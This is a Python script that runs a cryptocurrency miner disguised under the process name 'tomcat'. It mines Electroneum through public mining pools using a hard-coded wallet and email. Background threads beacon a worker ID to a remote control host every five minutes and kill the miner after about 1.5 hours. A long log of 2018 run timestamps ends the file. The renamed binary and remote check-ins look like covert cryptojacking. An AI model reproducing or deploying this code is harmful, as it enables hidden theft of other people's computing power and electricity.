import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:22:07.287025
#2018-02-17 16:09:04.199700
#2018-02-17 17:56:06.246138
#2018-02-17 19:44:06.630273
#2018-02-17 21:33:01.921424
#2018-02-17 23:17:06.334367
#2018-02-18 01:04:03.771025
#2018-02-18 02:52:02.122279
#2018-02-18 04:41:04.396772
#2018-02-18 06:33:07.400444
#2018-02-18 08:21:06.092791
#2018-02-18 10:09:07.379567
#2018-02-18 11:55:01.510928
#2018-02-18 13:39:06.247783
#2018-02-18 15:28:07.952400
#2018-02-18 17:17:03.362401
#2018-02-18 19:06:04.667765
#2018-02-18 20:52:07.213742
#2018-02-18 22:37:01.511966
#2018-02-19 00:26:07.167949
#2018-02-19 02:11:04.990359
#2018-02-19 03:58:05.651137
#2018-02-19 05:43:03.827489
#2018-02-19 07:31:01.434781
#2018-02-19 09:21:05.295811
#2018-02-19 11:10:06.489220
#2018-02-19 12:56:07.595369
#2018-02-19 14:45:09.378982
#2018-02-19 16:33:06.374090
#2018-02-19 18:18:04.803454
#2018-02-19 20:05:10.747549
#2018-02-19 21:56:02.207555
#2018-02-19 23:41:04.877484
#2018-02-20 01:28:05.728777
#2018-02-20 03:17:03.485167
#2018-02-20 05:05:07.458538
#2018-02-20 06:48:06.276549
#2018-02-20 08:34:07.187128
#2018-02-20 10:18:09.039433
#2018-02-20 12:03:01.397671
#2018-02-20 13:49:01.670819
#2018-02-20 15:33:07.669802
#2018-02-20 17:20:10.555484
#2018-02-20 19:09:08.390554
#2018-02-20 20:59:07.069108
#2018-02-20 22:45:08.107656
#2018-02-21 00:29:07.335593
#2018-02-21 02:16:07.534662
#2018-02-21 04:05:01.633541
#2018-02-21 05:52:01.645676
#2018-02-21 07:39:07.398901
#2018-02-21 09:24:06.539081
#2018-02-21 11:13:04.280217
#2018-02-21 13:01:09.773976
#2018-02-21 14:49:05.646920
#2018-02-21 16:38:01.876165
#2018-02-21 18:27:01.896136
#2018-02-21 20:12:07.132137
#2018-02-21 22:01:05.425941
#2018-02-21 23:48:06.445614
#2018-02-22 01:40:05.480199
#2018-02-22 03:28:02.043420
#2018-02-22 05:15:06.721426
#2018-02-22 06:59:05.352346
#2018-02-22 08:46:02.031410
#2018-02-22 10:33:07.097825
#2018-02-22 12:19:08.174082
#2018-02-22 14:03:06.039594
#2018-02-22 15:50:14.597198
#2018-02-22 17:37:01.480158
#2018-02-22 19:23:09.227705
#2018-02-22 21:16:01.948320
#2018-02-22 23:02:08.357661
#2018-02-23 00:49:04.846977
#2018-02-23 02:36:08.911517
#2018-02-23 04:24:01.535050
#2018-02-23 06:09:07.406962
#2018-02-23 07:55:03.259550
#2018-02-23 10:10:05.906434
#2018-02-23 11:58:08.545746
#2018-02-23 13:48:07.160414
#2018-02-23 15:38:03.108186
#2018-02-23 17:27:01.916042
#2018-02-23 19:12:07.925392
#2018-02-23 20:56:08.277155
#2018-02-23 23:03:06.033992
#2018-02-24 00:52:05.693150
#2018-02-24 02:48:01.563885
#2018-02-24 04:38:07.270574
#2018-02-24 06:22:06.358403
#2018-02-24 08:10:01.608927
#2018-02-24 09:54:01.894320
#2018-02-24 11:48:03.840346
#2018-02-24 13:39:03.732720
#2018-02-24 15:26:05.676414
#2018-02-24 17:15:04.878996
#2018-02-24 19:06:04.708729
#2018-02-24 20:54:05.426313
#2018-02-24 23:20:06.453211
#2018-02-25 02:46:03.946290
#2018-02-25 06:24:05.469874
#2018-02-25 11:39:04.426460